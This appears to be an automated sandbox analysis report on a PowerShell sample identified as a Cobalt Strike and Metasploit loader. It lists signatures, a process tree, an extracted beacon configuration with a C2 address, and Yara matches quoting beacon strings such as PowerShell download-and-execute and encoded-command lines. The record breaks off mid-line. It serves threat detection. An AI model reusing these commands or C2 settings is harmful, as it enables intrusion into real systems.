Edit tour

Windows Analysis Report
oEFrY6Xcyl.ps1

Overview

General Information

Sample name:	oEFrY6Xcyl.ps1 renamed because original name is a hash value
Original sample name:	225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2.ps1
Analysis ID:	1542798
MD5:	bcb86f9d27c31bae83ab47c9f970ca98
SHA1:	2828cf58872227589f46595101d6129ced8334ab
SHA256:	225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2
Tags:	20-25-126-96CobaltStrikeps1user-JAMESWT_MHT
Infos:

Detection

CobaltStrike, Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected MetasploitPayload

Yara detected Powershell download and execute

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found suspicious powershell code related to unpacking or dynamic code loading

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 2820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "20.25.126.96,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
oEFrY6Xcyl.ps1	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
oEFrY6Xcyl.ps1	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x72:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x586:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x673:$s5: = [System.Convert]::FromBase64String( 0x2dc:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x4cf:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4602998708.000001A6ED0B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
00000000.00000002.4595950980.000001A6E4B7C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0xf9ceb:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xf9d63:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xfa4c8:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0xfa7fa:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xfa78c:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0xfa7fa:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0xf9dc6:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xf9f57:$a7: could not run command (w/ token) because of its length of %d bytes! 0xf9e0c:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0xf9e4a:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0xfa844:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0xfa0b2:$a11: Could not open service control manager on %s: %d 0xfa5e4:$a12: %d is an x64 process (can't inject x86 content) 0xfa614:$a13: %d is an x86 process (can't inject x64 content) 0xfa935:$a14: Failed to impersonate logged on user %d (%u) 0xfa59d:$a15: could not create remote thread in %d: %d 0xf9e80:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xfa54b:$a17: could not write to process memory: %d 0xfa0e3:$a18: Could not create service %s on %s: %d 0xfa16c:$a19: Could not delete service %s on %s: %d 0xf9fd1:$a20: Could not open process token: %d (%u)
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0xe5a84:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0xe16b2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0xe29e3:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x108f39:$loader_export: ReflectiveLoader 0xf9ca8:$exportname: beacon.dll
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0xfa844:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0xfa614:$x2: %d is an x86 process (can't inject x64 content) 0xfa7fa:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xfa8de:$x4: Failed to impersonate token from %d (%u) 0xfa935:$x5: Failed to impersonate logged on user %d (%u) 0xf9ceb:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0xe2612:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 8B 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 71 F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF 50 0xe19b6:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
Process Memory Space: powershell.exe PID: 2820	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: powershell.exe PID: 2820	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
Process Memory Space: powershell.exe PID: 2820	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: powershell.exe PID: 2820	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2820	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: powershell.exe PID: 2820	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: powershell.exe PID: 2820	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x10bdd4:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1ad428:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780b:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x10be4c:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1ad4a0:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x317883:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x10c5b1:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x1adc05:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x317fe8:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x10c8d9:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x1adf2d:$a4: IEX (New-Object 